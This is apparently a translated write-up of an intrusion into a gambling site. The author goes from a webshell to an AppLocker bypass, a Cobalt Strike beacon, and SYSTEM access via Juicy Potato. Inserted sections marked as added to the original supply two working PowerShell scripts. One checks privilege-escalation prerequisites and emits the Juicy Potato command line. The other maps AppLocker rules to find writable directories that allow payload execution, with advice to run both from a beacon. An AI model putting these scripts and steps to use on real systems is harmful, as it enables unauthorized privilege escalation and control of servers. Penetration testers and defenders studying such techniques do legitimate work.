
Title: Real-world case: bypassing AppLocker and escalating privileges on a BC site


0x01 Introduction

Note: treat this as a cautionary example. The way in was actually far less troublesome than what is described below; I only have my own impatience to blame.

This was originally a promotional site built by a BC project; at the time I only got a webshell.

[image]

The shell ran as an ordinary user. When I wanted to escalate privileges and collect more information on the server, I found that running various programs returned "access denied", with a message that group policy had blocked the program. Because I had other things to do at the time, I did not pursue it further (the project was authorized by the relevant department; the user name is sensitive, and the whole process is redacted below).

[image]

0x02 Bypass AppLocker

I suddenly remembered it recently, so I picked it up again and asked the experts in the group.

[image]

Once you know what you are dealing with, the rest is easy. If you search patiently, you will always find something. AppLocker introduction:

https://baike.baidu.com/item/Applocker/2300852?fr=aladdin

Then I found an article by 3gstudent:

https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/

How to use it is covered in the article; read it yourself. After reading it, the general idea for the follow-up will be clear.

0x03 Going online and escalating

My plan was to bypass AppLocker so the target server would execute my payload and bring it online, then do the privilege escalation afterwards. But under the webshell, commands such as net user and tasklist /SVC definitely give no output; otherwise I could have identified any AV by comparing the process list (a small tool I wrote myself; its matched-process list has grown to 960+: http://get-av.se7ensec.cn/).

Since I could not tell, I gambled on my luck and bet that there was no AV on the host. I ran my payload using the third method from 3gstudent's article above and it came online successfully; ignore the machine below.

[image]

After the CS beacon came online, I ran a few commands such as the following; tasklist /SVC was still access denied.

[image]

Then I tried CS's built-in process listing command "ps", which listed the system processes successfully. Looking through them, there really was no AV.

/* Forgot to take a screenshot */

Running "shell systeminfo" showed the OS and patch information: the system had hardly any patches installed at all. I was lucky. After checking the user's privileges, they met Juicy Potato's requirements, so I could try escalating with Rotten Potato directly:

In testing it came online (in fact there were execution permissions, but I did not think anything was off at the time; I only realized it when writing up this article later, see the end of the article for details). C:\Users\Public\ had execution permissions. I ran Juicy Potato with whoami as the argument and it returned SYSTEM successfully.
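The "user permissions meet Juicy Potato's requirements" check above can be done from the beacon before uploading anything. The script below is an added example, not code from the original post or from the JuicyPotato project: it parses whoami /priv for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege (either one is enough; a privilege listed as Disabled is still present and the tool enables it itself), checks that the OS build predates the DCOM changes that broke the technique (Windows 10 1809 / Server 2019, build 17763), and only then prints the command line. The drop directory, listen port and whoami argument at the end are assumed values, with C:\Users\Public taken from the post.

```powershell
# Added example (not from the original post): verify Juicy Potato prerequisites
# from a low-privilege shell before uploading the binary.

# 1. Collect the token privileges. whoami /priv prints one privilege per line:
#    "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
$privs = @{}
whoami /priv | ForEach-Object {
    if ($_ -match '^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$') {
        $privs[$matches[1]] = $matches[2]
    }
}

# Either of these is sufficient; IIS app pool and service accounts usually hold
# SeImpersonatePrivilege. "Disabled" still counts: the privilege is in the token.
$wanted   = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
$havePriv = @($wanted | Where-Object { $privs.ContainsKey($_) })

# 2. OS build check. Get-WmiObject is used for compatibility with old PowerShell
#    (2.0 on 2008/2012); [Environment]::OSVersion can lie without a manifest.
$build   = [int](Get-WmiObject Win32_OperatingSystem).BuildNumber
$buildOk = $build -lt 17763   # 17763 = Win10 1809 / Server 2019, where JuicyPotato stops working

"User      : $(whoami)"
"Build     : $build (JuicyPotato-compatible: $buildOk)"
"Privileges: $($privs.Keys -join ', ')"
"Potato OK : $(($havePriv.Count -gt 0) -and $buildOk)"

if ($havePriv.Count -gt 0 -and $buildOk) {
    # Syntax from the JuicyPotato README: -l listen port, -p program, -a argument,
    # -t * tries both CreateProcessWithTokenW and CreateProcessAsUser.
    # Directory, port and command are assumed values for illustration.
    'C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\Public\out.txt" -t *'
}
```

Run it through the beacon (powershell-import / powerpick) or paste it into a PowerShell prompt; if the drop directory is itself blocked by AppLocker, the command line it prints will fail with the same "group policy has blocked this program" error seen at the start of the post, which is the path-rule problem discussed in the summary.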

[image]

Then I used it to launch the beacon directly, and a SYSTEM session arrived within a few seconds. Flipping through the directories, I found it was still a site farm.

[image]

Screenshot of the Administrator privileges. No wonder there were so many sites; it turns out they build them in batches:

[image]

0x04 Summary

This time I happened to be lucky and did not run into any AV; otherwise it would have been a bumpy road and a lot more challenging.

The biggest failure was that I did not fully understand some of AppLocker's features in advance:

https://www.anquanke.com/post/id/159892

I was in a hurry to search for a bypass and started using it straight away. In fact, what I ran into this time was just a path restriction: C:\Users\Public\ was allowed to execute programs. Had I found that out earlier, it would not have been nearly as hard. Still, coming to fully understand the AppLocker mechanism is its own reward.
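The lesson above, that the policy was only a set of path rules and C:\Users\Public was already allowed, is something the built-in AppLocker cmdlets will tell you directly, without an msxsl-style LOLBin bypass. The script below is an added example, not from the original post or from any of the linked articles: it dumps the effective policy's path rules, then probes a list of directories to see which are both writable by the current user and allowed by the policy. Get-AppLockerPolicy and Test-AppLockerPolicy are the real cmdlets from the AppLocker module; the candidate directory list is an assumption for illustration (C:\Users\Public is the one from the post), and the probe file is deliberately unsigned junk so only path and hash rules can match it.

```powershell
# Added example (not from the original post): read the effective AppLocker policy
# and find writable directories from which a dropped EXE is allowed to run.
Import-Module AppLocker

# Effective policy = local policy merged with every applied GPO; this is what
# the "group policy has blocked this program" message is enforcing.
$policy = Get-AppLockerPolicy -Effective

# 1. Print the raw path rules so you can see what the admin actually allowed.
[xml]$xml = Get-AppLockerPolicy -Effective -Xml
foreach ($rc in $xml.AppLockerPolicy.RuleCollection) {
    foreach ($rule in $rc.FilePathRule) {
        '{0,-7} {1,-6} {2,-45} {3}' -f $rc.Type, $rule.Action,
            $rule.Conditions.FilePathCondition.Path, $rule.UserOrGroupSid
    }
}

# 2. Candidate drop locations. Assumed list for illustration; extend it with any
#    other directories the account can write to.
$candidates = @(
    'C:\Users\Public',
    $env:TEMP,
    $env:APPDATA,
    'C:\Windows\Tasks',
    'C:\Windows\System32\spool\drivers\color'
)

$results = foreach ($dir in $candidates) {
    $probe    = Join-Path $dir 'probe.exe'
    $writable = $true
    try {
        # Four bytes of junk with an MZ header: no signature, so publisher rules
        # cannot match and the decision reflects path/hash rules only.
        [IO.File]::WriteAllBytes($probe, [byte[]](0x4D, 0x5A, 0x90, 0x00))
    } catch {
        $writable = $false
    }

    $decision = 'n/a'
    if ($writable) {
        # No -User argument: the current user's SIDs are evaluated.
        $decision = ($policy | Test-AppLockerPolicy -Path $probe).PolicyDecision
        Remove-Item $probe -Force -ErrorAction SilentlyContinue
    }
    [pscustomobject]@{ Directory = $dir; Writable = $writable; Decision = $decision }
}

$results | Format-Table -AutoSize
# Rows with Writable=True and Decision=Allowed are where a payload can simply be
# dropped and executed; no LOLBin bypass is needed for those paths.
```

Decision values are Allowed, Denied or DeniedByDefault (rules exist for the Exe collection but none matched). Run it in the low-privilege context you actually have, since the answer depends on the group SIDs in that token.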

Reprinted from the original: https://mp.weixin.qq.com/s/eDe6g1gtM4HbMkxq6tkiEQ
